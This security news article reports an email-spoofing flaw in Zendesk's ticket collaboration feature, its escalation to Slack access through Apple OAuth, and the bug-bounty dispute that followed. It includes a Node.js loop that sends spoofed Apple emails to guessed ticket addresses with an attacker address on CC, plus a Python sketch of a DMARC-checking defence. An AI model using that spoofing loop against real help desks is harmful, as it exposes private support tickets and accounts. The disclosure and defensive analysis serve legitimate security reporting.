A security vulnerability in Zendesk, a widely used customer support platform, has been uncovered. The flaw allowed attackers to access support tickets from any company using Zendesk, posing significant risks to sensitive data.
Zendesk initially dismissed the vulnerability, which involved email spoofing, but pressure later forced the company to implement the necessary security fixes. Here's a detailed look at the issue and its implications.
The Vulnerability: How Email Spoofing Was Exploited
Zendesk is a popular platform for managing customer support tickets, used by major companies worldwide. The flaw was discovered when it was found that Zendesk lacked adequate protection against email spoofing.
This oversight allowed attackers to abuse the email collaboration feature and gain unauthorized access to support tickets.
The method was alarmingly simple. When an email is sent to a company's Zendesk support portal, a new ticket is created with a unique reply-to address, such as support+id{id}@company.com.
If an attacker knew this ticket ID, they could send a spoofed email from the original requester's address and CC themselves.
Zendesk would then add the attacker's email to the ticket, granting them full access to the ticket history. Here's a snippet of code demonstrating how an attacker could automate this process:
    const sendmail = require('sendmail')();

    // Assuming the ticket you created in step #2 was assigned a ticket ID of #453,
    // the verification email landed somewhere near there
    const range = [448, 457];

    for (let i = range[0]; i < range[1]; i++) {
        // Send spoofed emails from Apple to Zendesk, one per candidate ticket ID
        sendmail({
            from: 'appleid@id.apple.com',
            to: `support+id${i}@company.com`,
            cc: 'attacker@example.com',
            subject: '',
            html: 'comment body',
        }, function (err, reply) {
            console.log(err && err.stack);
            console.dir(reply);
        });
    }
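The defensive counterpart to the snippet above, as an added example that is not Zendesk's code or the researcher's: a model of a ticket-ingest handler that adds CC'd addresses as collaborators. The weak policy trusts the From header alone, which is the behaviour the article describes; the hardened policy only honours the CC list when the receiving MTA recorded a DMARC pass for the From domain in Authentication-Results, and otherwise holds the mail for review, mirroring the "suspend suspicious emails" fix. The ticket store, the mail, and the support+id{N}@company.example address scheme are constructed for the example.

```python
import re
from email import message_from_string
from email.utils import getaddresses, parseaddr

def fresh_tickets():
    """Constructed ticket store: ticket id -> requester and collaborator set."""
    return {453: {"requester": "alice@example.com", "collaborators": set()}}

# Constructed inbound mail: From claims the requester, CC is an outsider; the
# receiving MTA's Authentication-Results verdict is filled in below.
MAIL_TEMPLATE = """\
Authentication-Results: mx.company.example; dmarc={dmarc} header.from=example.com
From: Alice <alice@example.com>
To: support+id453@company.example
Cc: attacker@evil.example
Subject: Re: ticket

comment body
"""
SPOOFED_MAIL, GENUINE_MAIL = (MAIL_TEMPLATE.format(dmarc=v) for v in ("fail", "pass"))

def ticket_id_from_recipient(to_header):
    """Extract N from the support+id{N}@ reply-address scheme the article describes."""
    _, addr = parseaddr(to_header)
    match = re.fullmatch(r"support\+id(\d+)@.+", addr)
    return int(match.group(1)) if match else None

def sender_authenticated(msg):
    """True only if the MTA's Authentication-Results records dmarc=pass for the From domain."""
    # Assumes the MTA strips any Authentication-Results header arriving from outside.
    from_domain = parseaddr(msg["From"])[1].rpartition("@")[2].lower()
    for value in msg.get_all("Authentication-Results", []):
        match = re.search(r"dmarc=pass\s+header\.from=([\w.-]+)", value, re.I)
        if match and match.group(1).lower() == from_domain:
            return True
    return False

def ingest(raw, tickets, require_auth):
    """Handle one inbound mail; returns 'added', 'suspended' or 'ignored'."""
    msg = message_from_string(raw)
    ticket = tickets.get(ticket_id_from_recipient(msg["To"] or ""))
    if ticket is None or parseaddr(msg["From"])[1].lower() != ticket["requester"]:
        return "ignored"
    # Weak policy (require_auth=False): the From header alone proves identity, so a
    # spoofed reply gets its CC list added as collaborators with full ticket history.
    # Hardened policy: without a DMARC pass, hold the mail for review instead.
    if require_auth and not sender_authenticated(msg):
        return "suspended"
    for _, addr in getaddresses(msg.get_all("Cc", [])):
        ticket["collaborators"].add(addr.lower())
    return "added"
```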
Initial Dismissal and Subsequent Reactions
Upon discovering this vulnerability, the researcher reported it through Zendesk's bug bounty program.
However, the report was initially dismissed as "out of scope" because it relied on email spoofing.
This response did not come from Zendesk directly but through its third-party triage service on HackerOne. The researcher's persistence paid off when individual companies using Zendesk were alerted to the issue.
Many immediately disabled Zendesk's email collaboration feature to protect their systems. The pressure from these companies eventually forced Zendesk to acknowledge and address the vulnerability.
According to the GitHub report, the implications of this vulnerability extended beyond Zendesk.
The researcher realized that the flaw could be used to infiltrate private Slack workspaces by exploiting the Single Sign-On (SSO) systems that many companies use across both Slack and Zendesk.
By creating an Apple account with a company's support email address and requesting a verification code, attackers could use the same spoofing technique to access Slack accounts via Apple OAuth login.
This escalation demonstrated how interconnected systems could be compromised through seemingly minor vulnerabilities.
Aftermath and Lessons Learned
After weeks of reporting the issue to affected companies, some took swift action, while others blamed Zendesk.
Eventually, Zendesk implemented fixes by automatically enhancing its spam filters and suspending suspicious emails.
Despite these measures, the researcher received no bounty from Zendesk due to alleged breaches of disclosure guidelines. However, they earned over $50,000 in bounties from companies that appreciated the warning.
This incident highlights the critical importance of robust security measures in third-party tools like Zendesk. Companies must be vigilant about vulnerabilities in their integrated systems and ensure comprehensive validation processes are in place.